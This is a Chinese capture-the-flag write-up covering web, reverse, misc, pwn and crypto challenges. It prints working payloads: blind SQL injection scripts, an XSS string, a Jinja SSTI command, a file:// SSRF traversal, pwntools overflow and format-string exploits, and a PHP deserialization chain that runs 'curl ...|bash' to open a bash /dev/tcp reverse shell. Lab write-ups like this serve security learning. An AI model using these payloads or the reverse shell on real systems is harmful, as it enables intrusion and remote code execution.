一年一度。
WEB
0x00 Welcome2021
WELCOME /f1111aaaggg9.php HTTP/1.1 Host: 1.14.102.22:8011 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
0x01 babysql
想用的一个没过滤,好耶~
admin'^1^1#
提示:your uname:admin and your pwd:123456
admin'^0^1#
提示:wrong username or password
使用admin'^(length(database())=7)^1#
判断得知数据库的长度等于7。
爆库名,得到库名为babysql:
import requests url = r"http://47.100.242.70:4339/index.php" #admin^(ord(substr(database(),1,1))=199)^1 payload1 = "admin'^(ord(substr(database()," payload2 = ",1))=" payload3 = ")^1#" name = "" for i in range(1,8): for j in range(23,123): payload = payload1+str(i)+payload2+str(j)+payload3 data = {'uname':payload,'pwd':'shaw'} # print(payload) s = requests.post(url,data=data).text if ("admin" in s): name += chr(j) print(name) break
使用admin'^((select(length(group_concat(TABLE_NAME)))from(information_schema.tables)where(table_schema="babysql"))=14)^1#
判断得知,表名的长度等于14,爆表得到jeff,jeffjokes:
payload1 = "admin'^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='babysql'))," payload2 = ",1))=" payload3 = ")^1#"
继续爆列名,首先判断列名jeff的长度,等于23:admin'^((select(length(group_concat(COLUMN_NAME)))from(information_schema.columns)where(table_name="jeff"))=23)^1#
判断列名jeffjokes的长度,等于31: admin'^((select(length(group_concat(COLUMN_NAME)))from(information_schema.columns)where(table_name="jeffjokes"))=31)^1#
不知道哪个 都试试看也没有合适的,感觉自己跑错库了,然后真的跑错库了,哈哈^^:
payload1 = "admin'^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata))," payload2 = ",1))=" payload3 = ")^1#"
修改语句运行得到flag库,找到表名为fllag,列名为fllllllag,长度为22:admin'^((select(length(group_concat(fllllllag)))from(flag.fllag))=22)^1#
最终爆值即可:
import requests import time url = r"http://47.100.242.70:4339/index.php" #admin'^(ord(substr((select(fllllllag)from(fllag)),1,,1))=103)^1# payload1 = "admin'^(ord(substr((select(fllllllag)from(flag.fllag))," payload2 = ",1))=" payload3 = ")^1#" name = "" for i in range(1,26): for j in range(23,130): payload = payload1+str(i)+payload2+str(j)+payload3 data = {'uname':payload,'pwd':'shaw'} # print(payload) s = requests.post(url,data=data).text if ("admin" in s): name += chr(j) print(name) time.sleep(1) break
0x02 babyxss
有手有脑,构造就行:
'<script>console.log("'+"<script>alalertert(1)</script>+'");</script>';
0x03 Baby_PHP_Black_Magic_Enlightenment
第一关写入科学计数法即可绕过。
第二关:利用google找到的sha1函数碰撞绕过即可:
a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1& b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
第三关:二次url编码。
0x04 babyPy
SSTI:
{{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
0x05 babyphp
访问noobcurl.php,已经提示了flag在根目录,也没有啥限制:
http://47.100.242.70:4659/noobcurl.php?url=file://127.0.0.1/../../../../../../../flag
0x06 蜜雪冰城甜蜜蜜
f12,把id改成9就行。
0x07 babyPOP
题目如下:
<?php class a { public static $Do_u_like_JiaRan = false; public static $Do_u_like_AFKL = false; } class b { private $i_want_2_listen_2_MaoZhongDu; public function __toString() { if (a::$Do_u_like_AFKL) { return exec($this->i_want_2_listen_2_MaoZhongDu); } else { throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!"); } } } class c { public function __wakeup() { a::$Do_u_like_JiaRan = true; } } class d { public function __invoke() { a::$Do_u_like_AFKL = true; return "关注嘉然," . $this->value; } } class e { public function __destruct() { if (a::$Do_u_like_JiaRan) { ($this->afkl)(); } else { throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!"); } } } if (isset($_GET['data'])) { unserialize(base64_decode($_GET['data'])); } else { highlight_file(__FILE__); }
分析得知,类c在反序列化之后立即会a::$Do_u_like_JiaRan
= true;
类b中可以执行系统命令,但是有魔术方法__toString()
,想要调用就要把其当成字符串使用时触发。
只有类d可以将类b输出,但是调用类d还需要将其调用为函数。
类e可以将类d调用成函数。
但是还需要将类c和其他类进行串联。把类e放入类c中即可。
<?php class b { private $i_want_2_listen_2_MaoZhongDu; public function __construct(){ $this->i_want_2_listen_2_MaoZhongDu='curl http://ip:port/testdel|bash'; } } class c { public $shawroot; public function __construct(){ $this->shawroot=new e(); } } class d { public $value; public function __construct(){ $this->value=new b(); } } class e { public $afkl; public function __construct(){ $this->afkl=new d(); } } $data=new c(); echo base64_encode(serialize($data)); ?>
公网VPS中,testdel的内容如下,当然让题目curl前还需要开启监听:
bash -i >& /dev/tcp/ip/port 0>&1
REVERSE
0x00 easypyc
用pyinstxtractor.py逆出pyc,再使用uncompyle6工具得到py文件,内容如下:
# uncompyle6 version 3.8.0 # Python bytecode 3.8.0 (3413) # Decompiled from: Python 3.8.10 (default, Sep 28 2021, 16:10:42) # [GCC 9.3.0] # Embedded file name: easypyc.py whatbox = [ 0] * 256 def aaaaaaa(a, b): k = [ 0] * 256 t = 0 for m in range(256): whatbox[m] = m k[m] = ord(a[(m % b)]) else: for i in range(256): t = (t + whatbox[i] + k[i]) % 256 temp = whatbox[i] whatbox[i] = whatbox[t] whatbox[t] = temp def bbbbbbbbbb(a, b): q = 0 w = 0 e = 0 for k in range(b): q = (q + 1) % 256 w = (w + whatbox[q]) % 256 temp = whatbox[q] whatbox[q] = whatbox[w] whatbox[w] = temp e = (whatbox[q] + whatbox[w]) % 256 a[k] = a[k] ^ whatbox[e] ^ 102 def ccccccccc(a, b): for i in range(b): a[i] ^= a[((i + 1) % b)] else: for j in range(1, b): a[j] ^= a[(j - 1)] if __name__ == '__main__': kkkkkkk = 'Geek2021' tttttt = [117, 62, 240, 152, 195, 117, 103, 74, 240, 151, 173, 162, 17, 75, 141, 165, 136, 117, 113, 33, 98, 151, 174, 4, 48, 25, 254, 101, 185, 127, 131, 87] ssss = input('Please input your flag:') inp = [0] * len(ssss) if len(ssss) != 32: print('Length Error!!!!') exit(0) for i in range(len(ssss)): inp[i] = ord(ssss[i]) else: aaaaaaa(kkkkkkk, len(kkkkkkk)) bbbbbbbbbb(inp, 32) ccccccccc(inp, 32) for m in range(32): if tttttt[m] != inp[m]: raise Exception('sorry your flag is wrong') print('success!!!!!!') print('your flag is {}'.format(ssss))
然后就麻了,参考这个。
MISC
0x00 这是什么命令
根据题目描述:
cat flag.png | base64 | base64 | tac | nl | sort -k 2 > flag.txt ;rm -f flag.png & nohup php -S 0.0.0.0:2333 >> /dev/null 2>&1 &
访问flag.txt,得到内容如下:
因为贴心的标号序号了,再按数字顺序排列一下就好了。
sort -n -t ' ' -k 1 t.txt > t2.txt
再进行一次tac
,解两次Base64得到一张图片即为flag。
0x01 easysend
安装MetaMask,跟着教学走就行。
0x02 easycreat
(1)首先前往Remix:https://remix.ethereum.org
(2)Remix打开后,点击左侧的示例合约“ballot.sol”。
(3)前往Github上示例合约的页面:戳我。
(4)拷贝示例合约的全部代码,替换掉Remix中的合约内容。
(5)点击SOLIDITY COMPILER菜单下的Compile 3_Ballot.sol编译。
(6)点击DEPLOY & RUN TRANSACTIONS菜单下的Deploy进行部署,部署前记得把开发环境改为Injected Web3。
(7)MetaMask会弹出框框。点击确认。
(8)等待生成链接即可。
0x03 每日一溜
过滤http,提取出一张由乃的捧脸图,尾部有zip。打开得到:
vwxrstuopq34567ABCDEFGIHJyz021PQRSTKNMLOZabcdUVWXYefghijklmn89+/ FhMrPh94JHqS2jGQGM6QCsaDzI6ZyHqQQB==
用这个在线自定义base64解码得到flag。
PWN
0x00 恋爱小游戏
连我都要惊呼太简单了的程度,随便输个123就可以了。
0X01 恋爱小游戏2.0
用ida7.5可以自动过混淆,main函数如下:
int __cdecl main(int argc, const char **argv, const char **envp) { char buf[24]; // [rsp+0h] [rbp-20h] BYREF char s2[8]; // [rsp+18h] [rbp-8h] BYREF strcpy(s2, "hateyou"); init(argc, argv, envp); puts(&s); read(0, buf, 0x20uLL); if ( !strcmp(love, s2) ) { puts(&byte_402074); system("/bin/sh"); exit(0); } puts(&byte_402098); return 0; }
让它等于loveyou:
from pwn import * from struct import pack elf = ELF('./pwn111') local = 0 if local == 1: io = process('./pwn111') #gdb.attach(io,'b * 0x400A2A') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') else: io = remote('47.242.20.238',10000) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') payload = 'a'*(0x20-0x8)+'loveyou\x00'+p64(0xdeadbeef) io.recvuntil("\n") io.recvuntil("\n") io.sendline(payload) io.interactive()
0x02 check in
循环计算200次就可以了,也没有什么难度:
from pwn import * from struct import pack elf = ELF('./math') local = 0 if local == 1: io = process('./math') #gdb.attach(io,'b * 0x400A2A') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') else: io = remote('123.57.230.48',12343) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') for i in range(1,201): io.recvuntil("num1:") num1 = io.recvuntil("\n")[:-1] io.recvuntil("num2:") num2 = io.recvuntil("\n")[:-1] io.recvuntil("The sign of this calculation is ") function = io.recvuntil("\n")[:-1] calc = str(eval(num1+function+num2)) io.recvuntil("Give me your answer!!:\n") io.sendline(calc) io.interactive()
0x03 easyfmt
main函数没有有用的。vuln函数如下:
int vuln() { char v1[32]; // [esp+Ch] [ebp-4Ch] BYREF char format[32]; // [esp+2Ch] [ebp-2Ch] BYREF int v3; // [esp+4Ch] [ebp-Ch] BYREF v3 = 666; puts("First step:"); printf("%p\n", &v3); __isoc99_scanf("%13s", format); printf(format); if ( v3 != 12 ) exit(0); puts("Second Step"); puts("nice you enter there"); __isoc99_scanf("%20s", v1); return printf(v1); }
除了vuln函数外,还存在一个后门函数,所以思路为:首先让v3=0xC满足题目条件,再让return值返回到后门函数上。
第一步要知道第几个参数可控。经测试为第15个字符可控,如图所示:
p32(v3)
本身大小为4,再加8即12(0xC)。%8c
意思为8个空白字符。
from pwn import * from LibcSearcher import * elf = ELF('./format_string') local = 1 if local == 1: io = process('./format_string') #gdb.attach(io,'b * 0x08048634') #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') else: io = remote('node4.buuoj.cn',26933) libc = ELF('./libc/libc-2.23-0ubuntu11.so') io.recvuntil("First step:\n") v3 = int(io.recvuntil("\n",drop=True),16) log.success('v3: '+hex(v3)) payload = p32(v3)+"%8c%15$n" io.sendline(payload) io.interactive()
接下来要让返回地址跳到后门函数。经测试第7个参数可控。
在vuln函数中最后一个printf处下断点,看栈可得知v3距离return到的main函数为0x10(0xac-0x9c):
想让其跳到0x08048793
(backdoor),当前为0x804873e
,因此更改最后两个字节为93即可。0x93十进制即147,因为p32(v3+10)
占了4个字节,所以再加143。更改字节用hhn(n 改int型、ln 改long int型、hn 改word)。最终payload如下:
from pwn import * from LibcSearcher import * elf = ELF('./format_string') local = 0 if local == 1: io = process('./format_string') #gdb.attach(io,'b * 0x08048685') else: io = remote('123.57.230.48',12342) libc = ELF('./libc/libc-2.23-0ubuntu11.so') io.recvuntil("First step:\n") v3 = int(io.recvuntil("\n",drop=True),16) log.success('v3: '+hex(v3)) payload1 = p32(v3)+"%8c%15$n" io.sendline(payload1) io.recvuntil("there\n") payload2 = p32(v3+0x10)+"%143c%7$hhn" io.sendline(payload2) io.interactive()
CRYPTO
0x00 Classical music
维吉尼亚一把梭,密钥是flag。
0x01 三个也可以
from Crypto.Util.number import getPrime,bytes_to_long from flag import flag flag = bytes_to_long(flag) p = getPrime(100) q = getPrime(100) r = getPrime(100) n = p*q*r e = 65537 c = pow(flag, e, n) print(n) print(c) ''' 798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807 249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575 '''
使用yafu分解n得到三个素数(没截图^^),(p-1)*(q-1)*(r-1)得:
798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712
求d:
gmpy2.invert(65537,798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712) #得mpz(40300244384284458664389035512497982223263215867565711201073618351763565714690247279940929)
求明文:
#flag = pow(c, d, n) pow(249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575, 40300244384284458664389035512497982223263215867565711201073618351763565714690247279940929, 798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807)
得到:
0x5359437b6e6f775f796f755f736f6c76655f69747d
转字符:SYC{now_you_solve_it}